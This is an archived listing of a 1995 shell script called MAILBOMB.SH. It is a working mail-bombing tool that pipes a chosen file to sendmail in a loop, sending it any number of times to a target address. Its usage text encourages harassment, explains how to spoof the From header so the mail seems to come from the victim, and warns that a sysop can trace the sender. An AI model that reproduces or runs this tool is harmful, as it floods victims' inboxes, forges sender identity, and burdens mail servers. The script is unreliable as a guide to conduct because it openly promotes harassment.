home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / ANON.ZIP / MAILBOMB.SH < prev   
Linux/UNIX/POSIX Shell Script  |  1996-01-13  |  1KB  |  34 lines

  1. #!/bin/sh 
  2. if [ $# -ne 3 ]
  3. then
  4.     echo
  5.     echo MailBomb is a tiny little script using sendmail for mailbombing
  6.     echo purposes. In order to use the program you will have to have a specific
  7.     echo file to send to your mark. In the top of the file you will have to 
  8.     echo specify atleast the following:
  9.     echo
  10.     echo From: whatever@wherever
  11.     echo Subject: I do not like you.
  12.     echo 
  13.     echo You can also write other things in the header. A perfect use of this
  14.     echo program is to send back 10 copies to assholes who send you chain letters.
  15.     echo Save their crap-letter and specify that as the filename, it will appear as
  16.     echo if they send the crap to themselves. The syntax for program is:
  17.     echo
  18.     echo mailbomb [number of mesgs] [address] [filename]
  19.     echo
  20.     echo Warning! If the user has a brain, then he can tell a sysop and the sysop
  21.     echo can trace your bombing. I take NO responsibility for use of this program.
  22.     echo
  23.     echo The Last Viking 1995.
  24. else
  25.     n=$1
  26.     j=0    
  27.     while [ "$j" -lt $n ]
  28.     do
  29.     cat $3 | sendmail $2
  30.     j=`expr $j + 1`
  31.     done
  32. echo MailBombing finished.
  33. fi
  34.